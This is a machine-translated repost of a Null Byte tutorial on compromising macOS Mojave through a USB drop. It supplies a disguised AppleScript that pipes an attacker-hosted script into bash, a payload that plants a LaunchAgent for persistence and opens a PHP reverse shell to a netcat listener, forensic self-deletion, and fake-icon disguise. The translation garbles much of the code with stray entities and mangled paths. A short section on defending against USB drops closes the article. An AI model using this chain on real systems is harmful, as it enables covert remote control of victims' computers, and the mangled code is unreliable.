قالب وردپرس درنا توس
Home / Tips and Tricks / How to Hack Mojave 10:14 with a Self-Destructing Payload «Null Byte :: WonderHowTo

How to Hack Mojave 10:14 with a Self-Destructing Payload «Null Byte :: WonderHowTo



The latest version of macOS has arrived. While Mojave's ground breaking new dark fashion is driving everyone crazy, we will use the insecure file permissions to establish a persistent backdoor with a self-destructive payload that provides little evidence for the forensics. [196592002] Mojave 10:14, Apple's latest version of macOS, was released on September 24 and has tech enthusiasts talking. The new operating system made headlines with its new Dynamic Desktop wallpaper, enhanced screenshot tool and improved Finder application. It also highlighted some security and privacy features that we will talk more about in the future. Now let's focus on exploiting Mojave's bad USB permissions and using that information to compromise the operating system.

Why is macOS vulnerable to USB Drops?

First, we open Terminal and create a file on the desktop with touch .

  touch /Users//Desktop/file1.txt

Use ls to display its read, write, and execute permissions. The switch -l switches on the long-term output.

  ls -l / user /  / desktop /

-rw-r - r-- 1 tokyoneon employee 0 Sep 26 21:57 file1.txt 

Note the permissions -rw-r-r – here. We can read ( r ) and write ( w ) in the file, but they do not execute. While other users on the operating system can only read the file ( r – ). These are normal and generally secure file permissions assigned by the operating system to new user-created files.

If we now insert a USB flash drive, we own the device and ls -l the content, we find the following permissions:

  ls -l / Volumes / USB_NAME_HERE /

-rwxrwxrwx 1 tokyoneon Employee 0 Sep 27 2018 file2.txt
-rwxrwxrwx 1 tokyoneon Employee 0 Sep 27 2018 file3.png
-rwxrwxrwx 1 tokyoneon Employee 0 Sep 27 2018 file4.gif
drwxrwxrwx 1 tokyoneon representative 16384 Sep 27 2018 directory1.app 

You will notice that each file on the USB flash drive has read, write, and execute permissions. As with previous versions of macOS, USB drives mounted with Mojave are trusted and given excessive file attributes.

Readers familiar with trojan-crafted AppleScripts know that macOS apps are actually directories with the file extension ".app" as their directory name. If you double-click on such a file with execute permissions, the folder will not be opened in the Finder but will instead run the embedded binary file. This means that nefarious AppleScripts and other harmful files can be placed on the USB drive without the security system affecting the target macOS device.

Step 1: Identifying the USB Flash Drive

USB Flash Drives Formatted with Apple's The APFS file system does not work for this attack. Files on APFS formatted USB flash drives are given normal read and write permissions and therefore can not be run on the MacBook of a target.

We do not need a deep technical understanding of USB flash drive formats. Suitable are USB drives that are formatted with NTFS and FAT32. These formats are commonplace, cross-platform, and are pre-formatted as standard by manufacturers, so the target's MacOS is able to mount and read them.

To find the format type of the USB drive, use fdisk command with the -l switch. Note the "FAT32" format in the "Type" column.

  fdisk -l

Disk / dev / sdc: 28.7 GiB, 30752636928 bytes, 60063744 sectors

Device Start Start End Sectors Size Id Type
/ dev / sdc1 32 60063743 60063712 28.7G c W95 FAT32 (LBA) 

Alternatively, [macOS] Disk Utility can be used to view and format USB drives.

Step 2: Create a Self-Destructing Payload

I have several one-liner payloads for compromising macOS with Tclsh , Python and Ruby covered. All of this payload creates a single backdoor into the operating system that allows an attacker to execute various remote control commands and perform attacks after exploitation.

The payload described in this article is not fully geared to beginner penetesters, as I would like to take it one step higher by adding a persistence and self-destruct feature to the attack. In essence, this payload will embed a backdoor in the operating system and erase traces of itself from the USB flash drive. Before you continue, readers should know about AppleScripts, BASH, and MacOS startup items.

Let's take a quick look at what happens when a target clicks on a file we put on the USB stick:

Granted, self-destruction is a bit tricky. In a real-world scenario, when files suddenly disappear, the target user would almost certainly know something was wrong. This is not a very hidden feature for a payload, but may be useful to some readers. For example, if an attacker wanted to quickly extract information and immediately destroy the payload so that it could not be rebuilt during forensics

It would also be helpful in red team simulations where the offensive security team actively avoids detection by the enemy blue team trying to identify and prevent further compromises. The blue team knew something malicious was executed on the device, but they did not know what .

However, the following payload will not exfiltrate any data. Instead, a persistent backdoor is created that attempts to automatically connect to the attacker's server each time the target is logged into their Mac OS account. I've added comments (#) to explain what each part does.

  #! / Bin / bash

# Name of the malicious AppleScript stored on the USB drive dedicated to this target user. The name must be the same as on the USB drive for the script to find and delete.
payloadName = & evil; & # 39;

# Name of the shell script stored on the target device. This script is written to disk and executed when the destination logs on to its account. The com.apple.filename naming scheme is similar to many Mac OS system files. This file name is arbitrary and can be renamed as needed.
scriptName = & 39; com.apple.sh & # 39;

# The .plist file is a configuration file for storing settings for macOS services. This file name is arbitrary but must use the file extension .plist.
plistName = & 39; com.mojave.persistence.plist & # 39;

# Location of the attacker server / VPS hosting the Netcat listener. If this attack occurs on a local network, 192.168.0.XX can be used instead of a remote VPS IP address.
attackerHost = & # 39; 11 .22.33.44 & # 39;

# Port number of the attacker's Netcat Listener. This port number is arbitrary and can be changed.
attackerPort = & # 39; 9999 & # 39;

# PHP one-liners embedded in .plist configuration file, opens a TCP socket and uses / bin / bash to emulate the remote shell. This command can be replaced with another one-liner displayed on zero bytes, an Empire payload, or a custom payload of your design.
Payload = & phgr; -p & # 39;  & # 39; & # 39; $ s = fsockopen (& # 39;  "attacker's host " & # 39; "attacker's port" & # 39;); `/ bin / bash -i <&3 > & 3 2> & 3`; & # 39; & # 39; & # 39; & # 39; & # 39;

# Use echo to create the shell script "com.apple.sh" in the ~ / Library / Caches / directory, which contains many MacOS system files. If you place this script here, it may escape detection. This script contains the PHP payload.
echo -e "#! / bin / bash  payload"> / user / $ USER / Library / Caches / "$ scriptName"

# Grants shell script permission to run as the target $ USER.
chmod + x / user / $ USER / Library / Caches / "$ scriptName"

# An & if; instruction & # 39; Make sure the LaunchAgents directory exists. I have noticed that this directory does not exist in some fresh macOS installations.
if [[ ! -d /Users/$USER/Library/LaunchAgents ]]; then
mkdir / user / $ USER / Library / LaunchAgents
fi

# Create a simple .plist in the ~ / Library / LaunchAgents / directory that runs the previously created com.apple.sh script when the target user logs in to their macOS account. This directory must be used to run the com.apple.sh script at logon. .plist configuration files are in XML format in the following structure.
echo & # 39; 



	  Disabled 
	
	  Label 
	 & # 39; "$ scriptName" 
	  ProgramArguments 
	
		  / user / & # 39; "$ USER" & # 39; / Library / Caches / & # 39; "$ scriptName" & # 39; 
	
	  RunAtLoad 
	

  & # 39; / user / $ USER / Library / LaunchAgents / "$ plistName"

# Loads the newly created .plist configuration file into ~ / Library / LaunchAgents /, which allows persistence.
launchctl load / user / $ USER / Library / LaunchAgents / "$ plistName"

# This command finds the nasty AppleScript on the USB drive and deletes it with `rm` with the` -Prf` arguments, overwriting it several times to make deleting and forensics difficult, if not impossible.
find / Volumes -type d -iname "$ payloadName" *. app -exec rm -Prf {} ; 

Now that we know what the payload is doing, we can start setting up our server to host it and the Netcat listener

Step 3: Host the Payload with Python 3

The nasty AppleScript first fetches the payload that resides on our server and immediately runs it on the target MacBook. So we will host the payload with a simple Python 3 web server.

First make ( mkdir ) a directory in your home directory (~ /) called "pythonServer". Here, the payload is stored and made available to the network and the Internet.

  mkdir ~ / pythonServer 

Change ( cd ) to the newly created directory "pythonServer".

  cd ~ / pythonServer 

Save the self-destructive payload with nano (or your favorite text editor) in a file named "p.sh.". We use "p" (short for "payload") as file name to keep the AppleScript code (in the next step) short and simple.

  nano p.sh 

Start the Python 3 Web server with the following command:

  python3 -m http.server 80 

The http.server module ( -m ) creates a web server with port 80 . By changing the following 11.22.33.44 IP address to the attacker's system, this web server can be tested by navigating to the following URL using a web browser.

  http://11.22.33.44/p.sh 

This Python 3 terminal must remain open for the server to remain active. Run the following commands using a new terminal window.

Step 4: Starting the Netcat Listener

The Netcat Listener should be started on the attacker's Kali machine or on the Virtual Private Server (VPS). This is where the MacBook targets the target device when the nasty AppleScript on the USB drive is opened.

Use the following Netcat command to start the listener.

  nc -l -p 9999 
  • Netcat opens a listening ( -l ) port on every available interface. If you are working on a local network, the Netcat listener is available at your local address (for example, 192.168.0.XX). If the listener is started on a virtual private server, this IP address must be committed to the payload.
  • The port ( -p) number ( 9999 ) is arbitrary and may be changed as needed.

Step 5: Make the Bad AppleScript

Now that we have our payload available for download, we can create our evil AppleScript application. This step requires macOS and Script Editor to build AppleScript applications.

Open Script Editor and enter the following text.

  do shell script "curl -s http: // 11.22.33.44/p.sh | bash - &" 

To direct AppleScript to execute code, must issue the shell script be preceded. Then curl implicitly ( -s ) will download the "p.sh" payload from the attacker system. Finally, it will piping the payload directory into the bash command ( | ) while it is running as a background process ( & ). Remember that the attacker's IP address ( 11.22.33.44 ) can point to a Kali machine on the local network or a VPS IP address.

Click "File" and then "Export" to save the AppleScript to the ~ / Desktop as application. Do not store it on the destination USB drive. MacOS likes to create hidden files that could allow a forensics team to learn about the payload – and we do not want these files to touch the USB drive.

Step 7: Copy the AppleScript to the USB flash drive

Insert the USB Drop device intended for the target into your MacBook. Open a terminal and run the following command to copy the nasty AppleScript to the USB drive ( cp ):

  cp -rX / Users /  / Desktop / evil  / Volumes / USB -NAME-HERE / 

We must press tab on the keyboard so that Terminal automatically completes the file name. This makes it possible to copy it to the USB drive while containing the Unicode characters in the file name. This command recursively ( -r ) copies the directory without ( -X ) including and hidden backup files created by the operating system.

Step 8: Disguise the icon so that it appears a text file

This step must be performed last because the path of the fake icon is hard-coded into the AppleScript. We need to save the fake icon first in the nasty application and then drag and drop it into the Get Info window (see GIF below).

This text file icon was made in a hurry, so it's not an exact copy of a real thing. If we look closely, the "TXT" overlay is not quite as dark and the shadow that outlines the symbol is not exactly right. But I think that's acceptable as it gives readers an idea of ​​how close these symbols can look to appear like the original in just a few seconds. When grouping with similar-looking files, it may be difficult to distinguish the real text files from the payloads.

For details on how to create these Apple file icons ( .icns ), read my article " Create Make a fake PDF Trojan with AppleScript "

Step 9: Let the Pwnage Begin

When the target user clicks the fake text file button, a new Netcat connection is built up for the first time. Thereafter, a new connection is attempted each time the destination logs in to its macOS account.

Further compromising of the target and its accounts may start with attacks after exploitation such as privilege escalation attacks The MacBook microphone in real-time and storing passwords in web browsers

How To Protect Yourself From USB Drop Attacks

This attack was executed against a new Mojave installation with all default Finder settings. There are some improvements we can make to macOS to help locate such attackers.

  • Do not use strange USB drives . If you find a USB key that does not belong to you, do not use it. This is possibly the best advice we can give. A well placed USB stick could be the result of a thoughtful social engineering attack against you or your employer. Regardless of how the USB drive is labeled or what files are displayed on it, do not insert it into your MacBook. If you really want to know what's on the USB drive, the following strategies will help you identify dodgy files.
  • Do not double-click on files . It is always best to explicitly choose which program to use when opening files. Right-click on the desired file and manually select an application from the "Open With" menu. You'll find that AppleScript applications do not have an Open With option in the context menu. That's because they're actually directories and can not be opened with applications like TextEdit.
  • Lists files on the USB . If in doubt, use the terminal to list files on the USB drive ( ls ). File extensions can not be forged under any circumstances. Use this command with -l to print the USB content in a list format, and -a to display all the files on the USB drive, including hidden files.
  ls -la / volume / USB-NAME-HERE /

drwxrwxrwx @ 1 tokyoneon employees 16384 September 28 11:01.
drwxr-xr-x @ 4 root wheel 128 Sep 28 03:52 ..
drwxrwxrwx @ 1 tokyoneon Staff 16384 Sep 28 05:03 evil.txṫ.app
-rwxrwxrwx 1 tokyoneon employee 3566129 Sep 28 02:40 real.txt
-rwxrwxrwx 1 tokyoneon employee 1938446 Sep 28 02:41 .hiddenfile.txt 
  • Use the file command . The command file can be used to specify file types. Just specify the path to the file you want to examine. As we can see in the following issue, real text files are read as "ASCII text" while AppleScripts are read as "directory". For more information about the file, refer to the manual man file to view the manual.
  file /Volumes/USB-NAME/real.txt
/Volumes/USB-NAME/real.txt: ASCII text

File /Volumes/USB-NAME/evil.txṫ.app
/Volumes/USB-NAME/evil.txṫ.app: directory 

That was & # 39; s for today. Be sure to leave a comment if you liked this article. I'm also available on Twitter @tokyoneon_ If You Have Questions or Concerns

Do not Miss: How to Sniff Passwords on a Mac in Real Time

Title image and screenshots of tokyoneon / zero byte




Source link